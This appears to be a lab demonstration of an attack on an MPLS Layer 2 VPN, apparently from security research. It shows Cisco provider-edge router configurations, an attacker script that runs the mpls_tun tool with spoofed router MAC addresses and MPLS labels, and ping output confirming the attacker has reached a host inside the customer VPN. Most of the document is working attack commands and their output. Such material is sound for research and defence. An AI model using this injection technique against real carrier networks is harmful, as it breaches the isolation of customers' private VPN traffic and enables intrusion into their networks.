***************
*    VPN1     *
*172.16.0.0/24*
***************
       *
       *
*******************   *******************   *******************
*       PE1       *****     ATTACKER    *****       PE2       *
*00:1f:9d:44:8c:c0*   *                 *   *00:13:1a:42:1d:40*
*     3750-ME     *   *******************   *     3750-ME     *
*******************                         *******************           
                                                        *
                                                        *
                                                ***************
                                                *     VPN2    *
                                                *172.16.0.0/24*
                                                ***************



PE1:


interface Loopback0
 ip address 192.168.1.1 255.255.255.255
!
interface FastEthernet1/0/2
 no switchport
 no ip address
 no keepalive
 xconnect 192.168.1.2 200 encapsulation mpls
!
interface GigabitEthernet1/1/2
!
interface Vlan1
 ip address 10.10.10.1 255.255.255.0
 mpls ip  
!
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.1 0.0.0.0 area 0
!
mpls ldp router-id Loopback0 force



PE1_3750me#sh mpls l2transport vc

Local intf     Local circuit              Dest address    VC ID      Status    
-------------  -------------------------- --------------- ---------- ----------
Fa1/0/2        Ethernet                   192.168.1.2     200        UP   




PE2:

interface Loopback0
 ip address 192.168.1.2 255.255.255.255
!
interface FastEthernet1/0/2
 no switchport
 no ip address
 no keepalive
 xconnect 192.168.1.1 200 encapsulation mpls
!
interface GigabitEthernet1/1/2
!
interface Vlan1
 ip address 10.10.10.2 255.255.255.0
 mpls ip  
!
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.2 0.0.0.0 area 0
!
mpls ldp router-id Loopback0 force



PE2_3750me#sh mpls l2transport vc

Local intf     Local circuit              Dest address    VC ID      Status    
-------------  -------------------------- --------------- ---------- ----------
Fa1/0/2        Ethernet                   192.168.1.1     200        UP   




ATTACKER:



# cat test2.sh

#!/bin/sh
./mpls_tun -m eompls -d br0 -D br0 -i 16 -o 16 -I 00:1f:9d:44:8c:c0 -O 00:13:1a:42:1d:40 -v &
sleep 2
ifconfig tap0 172.16.0.3/24
ifconfig tun0 mtu 1300
ping 172.16.0.2




# ./test.sh

mpls_tun version 0.1	by Daniel Mende - dmende@ernw.de
Tunnel interface tap0 started
Opening tunnel at br0 with MAC 00:1f:9d:44:8c:c0
Sending to MAC 00:13:1a:42:1d:40 on interface br0
PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data.
64 bytes from 172.16.0.2: icmp_seq=1 ttl=255 time=1.82 ms
64 bytes from 172.16.0.2: icmp_seq=2 ttl=255 time=2.30 ms
64 bytes from 172.16.0.2: icmp_seq=3 ttl=255 time=2.47 ms
64 bytes from 172.16.0.2: icmp_seq=4 ttl=255 time=1.09 ms
64 bytes from 172.16.0.2: icmp_seq=5 ttl=255 time=1.89 ms
^C
--- 172.16.0.2 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4005ms
rtt min/avg/max/mdev = 1.094/1.919/2.475/0.479 ms
